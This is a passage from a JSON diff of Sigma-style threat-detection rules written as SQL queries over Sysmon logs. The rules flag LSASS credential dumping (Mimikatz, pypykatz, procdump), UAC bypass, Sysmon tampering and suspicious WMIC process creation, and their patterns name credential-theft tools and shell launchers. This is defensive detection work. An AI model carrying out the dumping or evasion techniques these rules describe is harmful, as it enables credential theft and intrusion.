[ - "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. 
Filter legitimate activity accordingly" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_stop_service.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "UAC Bypass via Windows Firewall Snap-In Hijack", - "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", + "title": "Rare GrantedAccess Flags on LSASS Access", + "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", "status": "experimental", - "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", - "author": "Tim Rauch", + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software accessing LSASS process for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT 
(((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE 
'%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" ], - "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + "filename": "proc_access_win_rare_proc_access_lsass.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - 
"level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "Data Copied To Clipboard Via Clip.EXE", - "id": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "status": "test", - "description": "Detects the execution of clip.exe in order to copy data to the clipboard. 
Adversaries may collect data stored in the clipboard from users copying information within or between applications.", - "author": "frack113", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1115" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\clip.exe' ESCAPE '\\' OR OriginalFileName = 'clip.exe'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE 
'\\'))" ], - "filename": "proc_creation_win_clip_execution.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Potential NT API Stub Patching", + "id": "b916cba1-b38a-42da-9223-17114d846fd6", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 
'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE 
'%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_invoke_patchingapi.yml" }, { - "title": "Suspicious Cabinet File Expansion", - "id": "9f107a84-532c-41af-b005-8d12a607639f", - "status": "test", - "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", - "author": "Bhabesh Raj", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 
'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" ], - "filename": "proc_creation_win_expand_cabinet_files.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine 
LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "description": "Detects process access to LSASS memory with suspicious access flags", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE 
'\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "DLL Execution Via Register-cimprovider.exe", - "id": "a2910908-e86f-4687-aeba-76a5f996e652", - "status": "test", - "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", - "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "title": 
"Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "status": "experimental", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ "attack.defense_evasion", - "attack.t1574" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Download Arbitrary Files Via MSOHTMED.EXE", - "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", "status": "experimental", - "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir 